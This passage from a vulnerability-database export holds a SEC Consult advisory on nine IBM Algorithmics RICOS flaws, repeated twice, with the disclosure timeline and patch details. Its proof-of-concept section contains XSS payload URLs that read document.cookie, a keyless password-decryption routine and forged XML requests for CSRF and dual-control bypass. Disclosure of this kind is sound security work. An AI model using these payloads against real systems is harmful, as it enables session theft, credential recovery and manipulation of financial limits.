PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-16T00:00:00", "title": "SEC Consult SA-20140630-0 :: Multiple vulnerabilities in IBM Algorithmics RICOS", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0867", "CVE-2014-0870", "CVE-2014-0871", "CVE-2014-0868", "CVE-2014-0894", "CVE-2014-0869", "CVE-2014-0865", "CVE-2014-0866", "CVE-2014-0864"], "modified": "2014-10-16T00:00:00", "id": "SECURITYVULNS:DOC:31286", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31286", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:46:23", "description": "Information leakage, cross-site scripting, CSRF, privilege escalation, unauthorized access.", "edition": 2, "cvss3": {}, "published": "2014-10-16T00:00:00", "type": "securityvulns", "title": "IBM Algorithmics RICOS multiple security vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0867", "CVE-2014-0870", "CVE-2014-0871", "CVE-2014-0868", "CVE-2014-0894", "CVE-2014-0869", "CVE-2014-0865", "CVE-2014-0866", "CVE-2014-0864"], "modified": "2014-10-16T00:00:00", "id": "SECURITYVULNS:VULN:14038", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14038", "sourceData": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T13:21:36", "description": "No description provided by source.", "cvss3": {}, 
"published": "2014-07-02T00:00:00", "type": "seebug", "title": "IBM Algorithmics RICOS 4.5.0 - 4.7.0 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0864", "CVE-2014-0865", "CVE-2014-0866", "CVE-2014-0867", "CVE-2014-0868", "CVE-2014-0869", "CVE-2014-0870", "CVE-2014-0871", "CVE-2014-0894"], "modified": "2014-07-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87112", "id": "SSV:87112", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\nSEC Consult Vulnerability Lab Security Advisory < 20140630-0 >\r\n=======================================================================\r\n title: Multiple severe vulnerabilities\r\n product: IBM Algorithmics RICOS\r\n vulnerable version: 4.5.0 - 4.7.0\r\n fixed version: 4.7.0.03\r\n CVE number: CVE-2014-0894\r\n CVE-2014-0871\r\n CVE-2014-0870\r\n CVE-2014-0869\r\n CVE-2014-0868\r\n CVE-2014-0867\r\n CVE-2014-0866\r\n CVE-2014-0865\r\n CVE-2014-0864\r\n impact: critical\r\n homepage: http://www-01.ibm.com/software/analytics/algorithmics/\r\n found: 2013-12-19\r\n by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky\r\n SEC Consult Vulnerability Lab\r\n https://www.sec-consult.com\r\n=======================================================================\r\n \r\nVendor description:\r\n- -------------------\r\nIBM Algorithmics software enables financial institutions and corporate\r\ntreasuries to make risk-aware business decisions. 
Supported by a global\r\nteam of risk experts based in all major financial centers, IBM\r\nAlgorithmics solution offerings include market, credit and liquidity risk,\r\nas well as collateral and capital management.\r\n \r\nSource: http://www-01.ibm.com/software/analytics/algorithmics/\r\n \r\nRICOS is a pre-deal limit management solution part of the Algo Suite.\r\n \r\n \r\nBusiness recommendation:\r\n- ------------------------\r\nThe identified vulnerabilities affect integrity and confidentiality of the\r\nrisk management system. SEC Consult does not recommend to rely on RICOS as\r\npart of risk management until a thorough security review has been performed\r\nby security professionals. As a workaround, access should be limited only to\r\ntrusted users internally and sample checks regarding the plausibility of limits\r\nshould be performed manually.\r\n \r\n \r\nVulnerability overview/description:\r\n- -----------------------------------\r\n1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3)\r\nThe Tomcat configuration discloses technical details within error messages to\r\nthe user, which allows an attacker to collect valuable data about the\r\nenvironment of the solution.\r\n \r\n2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5)\r\nThe password and the username of the backend database are disclosed in\r\nclear-text to the user of the web application. This allows attackers to\r\ndirectly connect to the backend database and manipulate arbitrary data stored\r\nin the database (e.g. limits).\r\n \r\n3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3)\r\nSeveral parameters in the RICOS web front end and the Blotter are not properly\r\nsanitized and cause Cross-Site Scripting vulnerabilities. 
Attackers can steal\r\nuser sessions and impersonate other users while performing arbitrary actions\r\non behalf of the victim user.\r\n \r\n4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3)\r\nWeak cryptographic algorithms, being used to store and transfer\r\nuser's passwords, allow an attacker to retrieve the plain-text passwords\r\nwithout further knowledge of cryptographic keys.\r\n \r\n5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 /\r\nCVSS 3.5)\r\nSeveral fields of stored data within RICOS are marked as read-only in the web\r\napplication, disallowing modification of certain fields. These checks are only\r\nperformed client-side, allowing an attacker to alter arbitrary data. An\r\nattacker can create a limit, alter the username of the created limit and\r\nconfirm the limit himself, circumventing dual control mechanisms advertised by\r\nRICOS.\r\n \r\n6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3)\r\nA vulnerable page in RICOS allows an attacker to set and overwrite arbitrary\r\ncookies for a user that clicks on a manipulated link.\r\n \r\n7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3)\r\nThe RICOS fat client submits user credentials in plain-text. An attacker with\r\naccess to the network communication can perform man-in-the-middle attacks and\r\nsteal user credentials.\r\nThis vulnerability also applies to the Blotter, where authentication is\r\nperformed unencrypted.\r\n \r\n8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5)\r\nThe RICOS fat client performs input validation only client-side. This allows\r\nan attacker to alter arbitrary data. 
An attacker can create a limit, alter\r\nthe username of the created limit and confirm the limit himself, circumventing\r\ndual control mechanisms advertised by RICOS.\r\n \r\n9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3)\r\nThe web application does not verify that requests are made only from within\r\nthe web application, allowing an attacker to trick users into performing\r\nrequests to the web application. This allows an attacker to perform tasks on\r\nbehalf of the victim user like modifying limits.\r\n \r\n \r\nProof of concept:\r\n- -----------------\r\n1) Information Disclosure\r\nThe following URL causes a status 404, disclosing the Tomcat version:\r\nhttps://ricos/ricos470/classes/\r\n \r\nIf control characters (i.e. \\x00) are sent as part of the cookie, a stack trace\r\nis triggered\r\n \r\n2) Password Disclosure\r\nThe following request sent by the client during regular communication shows the\r\ndatabase connection settings including the username and the password in\r\nclear-text.\r\n \r\nPOST /ricos470/Executer HTTP/1.1\r\nHost: ricos\r\n \r\n...SNIP...\r\n<i n="URN" v=""/><i n="SecServiceURN" v="obsv2:ricos:20100"/><i n="SecSource" v="LM web"/><i\r\nn="SecTimeout" v="7200"/><i n="AcsAutoReconnect" v="Y"/><i n="AcsFunctionLimits" v=""/></t><t\r\nn="ObServer"><i n="UserId" v=""/><i n="Password" v=""/><i n="Host" v="ricos"/><i n="Port"\r\nv="20100"/><i n="CollectionId" v=""/><i n="DbName" v="RICA"/><i n="Location" v="RICA"/><i\r\nn="DbType" v="ORA"/><i n="Application" v="RICOS"/><i n="AppId" v="LM web"/><i n="AppDesc" v=""/><i\r\nn="AppVer" v="4.7.0"/><i n="Component" v="RICOS Gui"/><i n="DbUser" v="rica"/><i n="DbPass"\r\nv="password"/>\r\n...SNIP...\r\n \r\n3) Non-permanent Cross-Site Scripting\r\nThe following URLs demonstrate Cross-Site Scripting vulnerabilities:\r\n \r\nPOST /ricos470/rcore6/main/showerror.jsp HTTP/1.1\r\nHost: ricos\r\n \r\nMessage=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang....\r\n 
\r\nhttps://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x";+alert(document.cookie);//x\r\n \r\nhttps://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')");alert(document.cookie);//\r\n \r\nhttp://ricos/algopds/rcore6/main/browse.jsp?Init=N";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y\r\n \r\n \r\nhttp://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse"/><script>alert(document.cookie)</script>\r\n \r\n4) Broken Encryption\r\nThe user's password is transported frequently in requests within the application.\r\nThe following function decrypts the password without requiring any cryptographic key:\r\n \r\npublic static void decrypt(String string)\r\n{\r\n int nRadix = 32;\r\n int nR2 = nRadix * nRadix / 2;\r\n GregorianCalendar cal = new GregorianCalendar();\r\n String key = string.substring(0, 2);\r\n int nKey = Integer.parseInt(key, 32);\r\n \r\n String encPw = string.substring(2, string.length());\r\n int y = 0;\r\n for (int i = 0; i < encPw.length(); i+=2)\r\n {\r\n String aktuell = encPw.substring(i,i+2); \r\n int new_value = Integer.parseInt(aktuell, 32);\r\n int character = - nKey * (y + 1) % nR2 + new_value;\r\n char decrypt = (char) character;\r\n System.out.print(decrypt);\r\n y = y + 1;\r\n } \r\n}\r\n \r\n5) Manipulation of read-only data / dual control mechanism bypass\r\nThe following example illustrates how to manipulate a request so that the server\r\nsaves it on behalf of another user (only the relevant parts are shown):\r\n \r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<ds>\r\n <t n="Service">\r\n <i n="RequestType" v="#Action"/>\r\n <t n="#ActionData">\r\n <i n="#ActionName" v="web.getmeta_udf"/>\r\n <i n="#Mode" v="#Sync"/>\r\n <i n="#Request" v="#Execute"/>\r\n <t n="#OutputData">\r\n <t 
n="#MapTable">\r\n <i n="#ResultData" v="#ResultData"/>\r\n <i n="#ResultTable" v="#ResultTable"/>\r\n </t>\r\n </t>\r\n <t n="#InputData">\r\n <t n="#WorkTable">\r\n <t n="det_limit">\r\n <i n="SCTYGEID" v="A"/>\r\n[...]\r\n <i n="LMLCURID" v="other_user"/>\r\n <i n="LMEQEPSTDA" v=""/>\r\n[...]\r\n <i n="MFURID" v="other_user"/>\r\n <i n="LMEVFL" v="N"/>\r\n <i n="SOLMFL" v="N"/>\r\n[...]\r\n <i n="CRURID" v="other_user"/>\r\n <i n="MFTS" v=""/>\r\n <i n="MFURID" v="other_user"/>\r\n[...]\r\n <i n="CRURID" v="other_user"/>\r\n <i n="MFTS" v=""/>\r\n[...]\r\n </t>\r\n <t n="Session">\r\n <t n="SessionData">\r\n <i n="LoginUser" v="other_user"/>\r\n <i n="LoginPass" v="8HC34BCM5JE84ND95RED"/>\r\n[...]\r\n <i n="LoginUser v="other_user"/>\r\n <i n="LoginPWD" v="326K9DC9FNIT3T70A3D6"/>\r\n <i n="URN" v=""/>\r\n <i n="SecServiceURN" v="obsv2:ricos:20100"/>\r\n[...]\r\n </t>\r\n <t n="ObServer">\r\n <i n="UserId" v="other_user"/>\r\n <i n="Password" v=""/>\r\n <i n="Host" v="ricos"/>\r\n[...]\r\n <i n="Prefix" v="RICA"/>\r\n <i n="DbSystem" v="oracle"/>\r\n <i n="LoginUserId" v="other_user"/>\r\n </t>\r\n </t>\r\n </t>\r\n</ds>\r\n \r\n6) Cross-Site Cookie Setting\r\nThe following URL allows setting of arbitrary cookies:\r\n \r\nhttps://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content\r\n \r\n7) Plain-text submission of passwords\r\nNeither the fat client nor the Blotter use https to communicate with the\r\nbackend server. 
Both send unencrypted credentials via http during authentication.\r\n \r\n8) Client-side Input Validation\r\nBy manipulating serialized objects that are transmitted by the fat client,\r\nit is possible to change the user name who created a limit, allowing an attacker\r\nto bypass dual control mechanisms.\r\n \r\n9) Cross-Site Request Forgery\r\nThe following request, sent on behalf of an authenticated user will e.g.\r\nchange the currency of a given deal:\r\n \r\nPOST http://ricos/ricos470/Executer HTTP/1.1\r\nHost: ricos\r\n \r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<ds>\r\n <t n="Service">\r\n <i n="RequestType" v="#Action"/>\r\n <t n="#ActionData">\r\n <i n="#ActionName" v="web.updrec_msp"/>\r\n <i n="#Mode" v="#Sync"/>\r\n <i n="#Request" v="#Execute"/>\r\n <t n="#InputData">\r\n <t n="#MapTable">\r\n <i n="#InputData" v="det_msp"/>\r\n </t>\r\n <t n="#WorkTable">\r\n <t n="det_msp">\r\n <i n="SYPMID" v="SYS-PAR-ID"/>\r\n <i n="CUCD" v="USD"/>\r\n <i n="MIGORILV" v="11"/>\r\n <i n="ILPLMVFL" v="Y"/>\r\n <i n="ILNEMVFL" v="Y"/>\r\n <i n="BSCUONFL" v="N"/>\r\n <i n="PBSCUOFL" v="N"/>\r\n <i n="LORICUTEFL" v="N"/>\r\n <i n="SYSAVAILFL" v="F"/> \r\n <i n="CUSTID" v="CUSTOMER"/>\r\n <i n="CBNALI" v="IS-LOCATED-IN"/>\r\n <i n="CBNAAG" v="AUTOMATIC-GROUP"/>\r\n <i n="UDF1" v="Welcome to ricos 4.71"/>\r\n </t>\r\n...SNIP...\r\n \r\n \r\nVulnerable / tested versions:\r\n- -----------------------------\r\nIBM Algorithmics RICOS 4.71\r\n \r\n \r\nVendor contact timeline:\r\n- ------------------------\r\n2014-01-24: Contacting vendor through psirt@vnet.ibm.com\r\n2014-01-24: Vendor response, will likely require more than 30 days to resolve issues\r\n asking for acknowledgements\r\n2014-01-24: Sending acknowledgements\r\n2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues\r\n2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS\r\n2014-02-10: Providing further information on assumed to be false positive issue 
1441\r\n2014-02-14: Telco to clarify vulnerability details and agree on further procedure\r\n patches are scheduled for end of June 2014\r\n2014-02-20: Vendor confirms issue 1441 to be a vulnerability\r\n2014-05-27: Vendor announces that patches will be released on 2014-06-30\r\n2014-06-26: Vendor published patches and security bulletin\r\n https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\r\n2014-06-30: SEC Consult publishes the advisory\r\n \r\n \r\nSolution:\r\n- ---------\r\nApply patch ACLM 4.7.0.03 FP5. More information:\r\nhttps://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\r\n \r\n \r\nWorkaround:\r\n- -----------\r\nLimit access to RICOS and manually perform sample checks regarding the\r\nplausibility of limits.\r\n \r\n \r\nAdvisory URL:\r\n- -------------\r\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\r\n \r\n \r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Vulnerability Lab\r\n \r\nSEC Consult\r\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius\r\n \r\nHeadquarter:\r\nMooslackengasse 17, 1190 Vienna, Austria\r\nPhone: +43 1 8903043 0\r\nFax: +43 1 8903043 15\r\n \r\nMail: research at sec-consult dot com\r\nWeb: https://www.sec-consult.com\r\nBlog: http://blog.sec-consult.com\r\nTwitter: https://twitter.com/sec_consult\r\n \r\nInterested to work with the experts of SEC Consult?\r\nWrite to career@sec-consult.com\r\n \r\nEOF F. 
Lukavsky / @2014\r\n", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87112", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:20", "description": "\nIBM Algorithmics RICOS 4.5.0 4.7.0 - Multiple Vulnerabilities", "edition": 2, "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "IBM Algorithmics RICOS 4.5.0 4.7.0 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0867", "CVE-2014-0870", "CVE-2014-0871", "CVE-2014-0868", "CVE-2014-0894", "CVE-2014-0869", "CVE-2014-0865", "CVE-2014-0866", "CVE-2014-0864"], "modified": "2014-07-01T00:00:00", "id": "EXPLOITPACK:9C48C6D849BFEE90F78DF671DAF658A8", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSEC Consult Vulnerability Lab Security Advisory < 20140630-0 
>\n=======================================================================\n title: Multiple severe vulnerabilities\n product: IBM Algorithmics RICOS\n vulnerable version: 4.5.0 - 4.7.0\n fixed version: 4.7.0.03\n CVE number: CVE-2014-0894\n CVE-2014-0871\n CVE-2014-0870\n CVE-2014-0869\n CVE-2014-0868\n CVE-2014-0867\n CVE-2014-0866\n CVE-2014-0865\n CVE-2014-0864\n impact: critical\n homepage: http://www-01.ibm.com/software/analytics/algorithmics/\n found: 2013-12-19\n by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky\n SEC Consult Vulnerability Lab\n https://www.sec-consult.com\n=======================================================================\n\nVendor description:\n- -------------------\nIBM Algorithmics software enables financial institutions and corporate\ntreasuries to make risk-aware business decisions. Supported by a global\nteam of risk experts based in all major financial centers, IBM\nAlgorithmics solution offerings include market, credit and liquidity risk,\nas well as collateral and capital management.\n\nSource: http://www-01.ibm.com/software/analytics/algorithmics/\n\nRICOS is a pre-deal limit management solution part of the Algo Suite.\n\n\nBusiness recommendation:\n- ------------------------\nThe identified vulnerabilities affect integrity and confidentiality of the\nrisk management system. SEC Consult does not recommend to rely on RICOS as\npart of risk management until a thorough security review has been performed\nby security professionals. 
As a workaround, access should be limited only to\ntrusted users internally and sample checks regarding the plausibility of limits\nshould be performed manually.\n\n\nVulnerability overview/description:\n- -----------------------------------\n1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3)\nThe Tomcat configuration discloses technical details within error messages to\nthe user, which allows an attacker to collect valuable data about the\nenvironment of the solution.\n\n2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5)\nThe password and the username of the backend database are disclosed in\nclear-text to the user of the web application. This allows attackers to\ndirectly connect to the backend database and manipulate arbitrary data stored\nin the database (e.g. limits).\n\n3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3)\nSeveral parameters in the RICOS web front end and the Blotter are not properly\nsanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal\nuser sessions and impersonate other users while performing arbitrary actions\non behalf of the victim user.\n\n4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3)\nWeak cryptographic algorithms, being used to store and transfer\nuser's passwords, allow an attacker to retrieve the plain-text passwords\nwithout further knowledge of cryptographic keys.\n\n5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 /\nCVSS 3.5)\nSeveral fields of stored data within RICOS are marked as read-only in the web\napplication, disallowing modification of certain fields. These checks are only\nperformed client-side, allowing an attacker to alter arbitrary data. 
An\nattacker can create a limit, alter the username of the created limit and\nconfirm the limit himself, circumventing dual control mechanisms advertised by\nRICOS.\n\n6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3)\nA vulnerable page in RICOS allows an attacker to set and overwrite arbitrary\ncookies for a user that clicks on a manipulated link.\n\n7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3)\nThe RICOS fat client submits user credentials in plain-text. An attacker with\naccess to the network communication can perform man-in-the-middle attacks and\nsteal user credentials.\nThis vulnerability also applies to the Blotter, where authentication is\nperformed unencrypted.\n\n8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5)\nThe RICOS fat client performs input validation only client-side. This allows\nan attacker to alter arbitrary data. An attacker can create a limit, alter\nthe username of the created limit and confirm the limit himself, circumventing\ndual control mechanisms advertised by RICOS.\n\n9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3)\nThe web application does not verify that requests are made only from within\nthe web application, allowing an attacker to trick users into performing\nrequests to the web application. This allows an attacker to perform tasks on\nbehalf of the victim user like modifying limits.\n\n\nProof of concept:\n- -----------------\n1) Information Disclosure\nThe following URL causes a status 404, disclosing the Tomcat version:\nhttps://ricos/ricos470/classes/\n\nIf control characters (i.e. 
\\x00) are sent as part of the cookie, a stack trace\nis triggered\n\n2) Password Disclosure\nThe following request sent by the client during regular communication shows the\ndatabase connection settings including the username and the password in\nclear-text.\n\nPOST /ricos470/Executer HTTP/1.1\nHost: ricos\n\n...SNIP...\n<i n=\"URN\" v=\"\"/><i n=\"SecServiceURN\" v=\"obsv2:ricos:20100\"/><i n=\"SecSource\" v=\"LM web\"/><i\nn=\"SecTimeout\" v=\"7200\"/><i n=\"AcsAutoReconnect\" v=\"Y\"/><i n=\"AcsFunctionLimits\" v=\"\"/></t><t\nn=\"ObServer\"><i n=\"UserId\" v=\"\"/><i n=\"Password\" v=\"\"/><i n=\"Host\" v=\"ricos\"/><i n=\"Port\"\nv=\"20100\"/><i n=\"CollectionId\" v=\"\"/><i n=\"DbName\" v=\"RICA\"/><i n=\"Location\" v=\"RICA\"/><i\nn=\"DbType\" v=\"ORA\"/><i n=\"Application\" v=\"RICOS\"/><i n=\"AppId\" v=\"LM web\"/><i n=\"AppDesc\" v=\"\"/><i\nn=\"AppVer\" v=\"4.7.0\"/><i n=\"Component\" v=\"RICOS Gui\"/><i n=\"DbUser\" v=\"rica\"/><i n=\"DbPass\"\nv=\"password\"/>\n...SNIP...\n\n3) Non-permanent Cross-Site Scripting\nThe following URLs demonstrate Cross-Site Scripting vulnerabilities:\n\nPOST /ricos470/rcore6/main/showerror.jsp HTTP/1.1\nHost: ricos\n\nMessage=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang....\n\nhttps://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x\";+alert(document.cookie);//x\n\nhttps://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')\");alert(document.cookie);//\n\nhttp://ricos/algopds/rcore6/main/browse.jsp?Init=N\";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y\n\n\nhttp://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse\"/><script>alert(document.cookie)</script>\n\n4) Broken Encryption\nThe user's password is transported frequently in requests within the 
application.\nThe following function decrypts the password without requiring any cryptographic key:\n\npublic static void decrypt(String string)\n{\n int nRadix = 32;\n int nR2 = nRadix * nRadix / 2;\n GregorianCalendar cal = new GregorianCalendar();\n String key = string.substring(0, 2);\n int nKey = Integer.parseInt(key, 32);\n \n String encPw = string.substring(2, string.length());\n int y = 0;\n for (int i = 0; i < encPw.length(); i+=2)\n {\n String aktuell = encPw.substring(i,i+2); \n int new_value = Integer.parseInt(aktuell, 32);\n int character = - nKey * (y + 1) % nR2 + new_value;\n char decrypt = (char) character;\n System.out.print(decrypt);\n y = y + 1;\n } \n}\n\n5) Manipulation of read-only data / dual control mechanism bypass\nThe following example illustrates how to manipulate a request so that the server\nsaves it on behalf of another user (only the relevant parts are shown):\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<ds>\n <t n=\"Service\">\n <i n=\"RequestType\" v=\"#Action\"/>\n <t n=\"#ActionData\">\n <i n=\"#ActionName\" v=\"web.getmeta_udf\"/>\n <i n=\"#Mode\" v=\"#Sync\"/>\n <i n=\"#Request\" v=\"#Execute\"/>\n <t n=\"#OutputData\">\n <t n=\"#MapTable\">\n <i n=\"#ResultData\" v=\"#ResultData\"/>\n <i n=\"#ResultTable\" v=\"#ResultTable\"/>\n </t>\n </t>\n <t n=\"#InputData\">\n <t n=\"#WorkTable\">\n <t n=\"det_limit\">\n <i n=\"SCTYGEID\" v=\"A\"/>\n[...]\n <i n=\"LMLCURID\" v=\"other_user\"/>\n <i n=\"LMEQEPSTDA\" v=\"\"/>\n[...]\n <i n=\"MFURID\" v=\"other_user\"/>\n <i n=\"LMEVFL\" v=\"N\"/>\n <i n=\"SOLMFL\" v=\"N\"/>\n[...]\n <i n=\"CRURID\" v=\"other_user\"/>\n <i n=\"MFTS\" v=\"\"/>\n <i n=\"MFURID\" v=\"other_user\"/>\n[...]\n <i n=\"CRURID\" v=\"other_user\"/>\n <i n=\"MFTS\" v=\"\"/>\n[...]\n </t>\n <t n=\"Session\">\n <t n=\"SessionData\">\n <i n=\"LoginUser\" v=\"other_user\"/>\n <i n=\"LoginPass\" v=\"8HC34BCM5JE84ND95RED\"/>\n[...]\n <i n=\"LoginUser v=\"other_user\"/>\n <i n=\"LoginPWD\" v=\"326K9DC9FNIT3T70A3D6\"/>\n <i 
n=\"URN\" v=\"\"/>\n <i n=\"SecServiceURN\" v=\"obsv2:ricos:20100\"/>\n[...]\n </t>\n <t n=\"ObServer\">\n <i n=\"UserId\" v=\"other_user\"/>\n <i n=\"Password\" v=\"\"/>\n <i n=\"Host\" v=\"ricos\"/>\n[...]\n <i n=\"Prefix\" v=\"RICA\"/>\n <i n=\"DbSystem\" v=\"oracle\"/>\n <i n=\"LoginUserId\" v=\"other_user\"/>\n </t>\n </t>\n </t>\n</ds>\n\n6) Cross-Site Cookie Setting\nThe following URL allows setting of arbitrary cookies:\n\nhttps://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content\n\n7) Plain-text submission of passwords\nNeither the fat client nor the Blotter use https to communicate with the\nbackend server. Both send unencrypted credentials via http during authentication.\n\n8) Client-side Input Validation\nBy manipulating serialized objects that are transmitted by the fat client,\nit is possible to change the user name who created a limit, allowing an attacker\nto bypass dual control mechanisms.\n\n9) Cross-Site Request Forgery\nThe following request, sent on behalf of an authenticated user will e.g.\nchange the currency of a given deal:\n\nPOST http://ricos/ricos470/Executer HTTP/1.1\nHost: ricos\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<ds>\n <t n=\"Service\">\n <i n=\"RequestType\" v=\"#Action\"/>\n <t n=\"#ActionData\">\n <i n=\"#ActionName\" v=\"web.updrec_msp\"/>\n <i n=\"#Mode\" v=\"#Sync\"/>\n <i n=\"#Request\" v=\"#Execute\"/>\n <t n=\"#InputData\">\n <t n=\"#MapTable\">\n <i n=\"#InputData\" v=\"det_msp\"/>\n </t>\n <t n=\"#WorkTable\">\n <t n=\"det_msp\">\n <i n=\"SYPMID\" v=\"SYS-PAR-ID\"/>\n <i n=\"CUCD\" v=\"USD\"/>\n <i n=\"MIGORILV\" v=\"11\"/>\n <i n=\"ILPLMVFL\" v=\"Y\"/>\n <i n=\"ILNEMVFL\" v=\"Y\"/>\n <i n=\"BSCUONFL\" v=\"N\"/>\n <i n=\"PBSCUOFL\" v=\"N\"/>\n <i n=\"LORICUTEFL\" v=\"N\"/>\n <i n=\"SYSAVAILFL\" v=\"F\"/> \n <i n=\"CUSTID\" v=\"CUSTOMER\"/>\n <i n=\"CBNALI\" v=\"IS-LOCATED-IN\"/>\n <i n=\"CBNAAG\" v=\"AUTOMATIC-GROUP\"/>\n <i n=\"UDF1\" v=\"Welcome to ricos 4.71\"/>\n 
